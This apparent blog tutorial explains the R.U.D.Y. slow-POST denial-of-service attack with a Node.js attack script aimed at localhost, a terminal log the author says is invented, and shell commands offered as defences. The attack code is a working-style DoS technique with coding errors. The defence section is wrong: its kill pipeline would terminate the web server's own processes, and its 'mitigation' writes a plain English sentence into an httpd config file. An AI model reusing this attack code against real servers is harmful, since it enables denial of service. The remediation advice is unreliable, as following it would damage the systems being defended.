A quick understanding of DDoS attack is: DDoS stands for Distributed Denial of Service, and it’s goal is to crash the entire network or prevent authentic users from accessing the desired services due to too many fake attempts flooding the network with requests. Simple.
That’s why stopping a DDoS attack is something that any decent System Administrator can automate to protest against in a few minutes unless the DDoS attack is incredibly sophisticated — but that is a scenario that would require extreme amount of in-depth knowledge of networking and cybersecurity to cover, so we’ll leave that for another time.
R.U.D.Y is a type of cybersecurity attack that was developed as a successor to the DDoS attack. It stands for “R U Dead Yet?” The premise here is hinging on the final word, “Yet”.
Both attacks have same purpose i.e. to affect the network with the fake traffic so that server gets busy dealing with fake traffic and real users can’t connect. That means they both are classified as DoS attack.
DDoS attack can target almost any network service or network. On the other hand, a R.U.D.Y attack typically bypasses most usual security measures and focuses on Web Applications. Goal remains the same: Denial of Service.
The difference is in “how they do that?”. A DDoS is straight forward i.e. send as many packets as possible as fast as possible, usually from a botnet of breached machines. However, system administrators learned how to solve that problem relatively simply, blocking the devices sending more than x packets to the network. So hackers had to think of something new…
The idea is rather clever since the goal is to consume network resources, but we can’t keep connecting; how do we overwhelm it? The answer? Use HTTP POST requests altered to stay “open” as long as possible. These requests are intentionally slow and are sent at a low rate, designed to exhaust server resources, eventually rendering the server unavailable to legitimate users and result in denial of service.
Here I am giving you some actual code to look at. After all, you don’t just wank to hear about how these attacks and malware work, you want to see what this stuff is and how it works.
The code for this lesson is in my GitHub repository:
Ok, let’s start with the attack. We’re using Node.js for this example, and out script is here.
Let’s dive in…(Yes, you guessed correctly, importing libraries)
const http = require('http'); // Import the HTTP module for our HTTP requests
Now we have to designate out target…
const options = {
hostname: 'localhost', // Target hostname is ourselves for demonstration
port: 8080, // Target Post
path: '/submit', // Target path on the server
method: 'POST', // Use the HTTP POST method (not GET like last time)
headers: {
'Content-Type': 'application/x-www-form-urlencoded', // Content type header
}
};
It’s all explained in the comments, but we pick the hostname, port, and path on the server (Which goes to a submission field in the web application). Choose POST as our HTTP method, and then define the content type header at the target.
This next block is the R.U.D.Y Attack itself…
const req = http.request(options, (res) => { // Create the HTTP request
console.log(`STATUS: ${res.statusCode}`); // Log response status
res.setEncoding('utf8'); // Set encoding (ustf-8 is standard)
res.on('data', (chunk) => { // Handle response data as chunks
console.log(`BODY: ${chunk}`);
});
res.on('end', () => { // Handle the end of the networks response
console.log('No more data in response.');
});
});
But we also need to be ready for the server to come back with an error:
req.on('error', (e) => { // Handle if the request come back with an error
console.error(`problem with requests: ${e.message}`);
});
Now we have defined the error. It’s time now we see how to execute the R.U.D.Y Attack script we just created and run it on our target.
// Send the request body in small chunks with delays
req.write('data=1');
setTimeOut(() => { req.write('data=2'); }, 1000); // Delay the next piece of data
// Continue to delay and send data, never completing the request - This keeps the connection "open."
As in the above code explaination, I showed you that we have chose to attack ourselves i.e. ‘localhost’. But in the case of localhost if I down my own network then how I able to write this article for you?
So, I made up a fake terminal screen to show what a Network Admin or a Security Engineer would see after this script was run…
# Terminal Output Showing Incoming Requests
[12:35:01] Server Log: Received incomplete POST request to /submit
[12:35:03] Server Log: POST request to /submit still awaiting completion...
[12:35:15] Server Log: Received incomplete POST request to /submit
[12:35:20] WARNING: Multiple long-running POST requests detected# After a Few Minutes
[12:40:10] CRITICAL: High number of incomplete POST requests causing resource strain
[12:40:15] ALERT: Potential RUDY attack - unusual POST request pattern observed
# Monitoring Commands and Output
$ netstat -ant | grep ':8080' | grep 'ESTABLISHED'
tcp6 0 0 :::8080 :::* LISTEN
tcp6 321 0 192.168.1.5:8080 192.168.1.100:51784 ESTABLISHED
tcp6 322 0 192.168.1.5:8080 192.168.1.100:51785 ESTABLISHED
# ... (more lines indicating multiple established connections)
$ top -b -n 1 | grep 'httpd'
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1234 www-data 20 0 300852 5872 4188 S 0.3 0.6 0:00.75 httpd
# ... (showing httpd processes and their resource usage)
What good is knowing what it looks like to be attacked. If you don’t know how to defend yourself, Don’t worry I got your back.
This shows some ways of defending the attack and responding to it…
# Identifying and Terminating Suspicious Connections
$ sudo netstat -antp | grep ':8080' | grep 'ESTABLISHED' | awk '{print $7}' | cut -d'/' -f1 | xargs kill
# This command identifies processes associated with the suspicious connections and terminates them# Verifying Termination of Suspicious Connections
$ netstat -ant | grep ':8080' | grep 'ESTABLISHED'
# No output indicates that the connections have been successfully terminated
# Implementing Immediate Mitigation Measures
$ echo "POST requests exceeding 10 seconds will be dropped" | sudo tee /etc/httpd/conf.d/rudy_mitigation.conf
$ sudo systemctl restart httpd
# This adds a configuration rule to drop long-running POST requests and restarts the HTTP server to apply it
That should give you enough context to understand what you’d be seeing, how to respond, and how to prevent your network from getting clogged. I hope that insight into victim’s screen helps.
I am obligated to repeat that this is purely an educational exercise. I am teaching how cybersecurity incident happen and what to look for. I do not endorse anything I’ve created or shown anywhere to be used for an illegal or unethical purposes. The use of any code (including the demonstration script I’ve included here) to cause harm in any form is illegal, and you can face criminal prosecution. You have been warned. Please don’t come to my lessons hoping to learn how to cause damage; go so you can learn how to protect them. That should be all the incentive you need, but since it isn’t always the case, I’ll add that knowing how to protect against ALL the different things I’ve shown thus far. I will show in the future that it will make you a lot more money than using them illegally, and you also avoid the risk of prison.
As always, thanks for reading, and stay safe!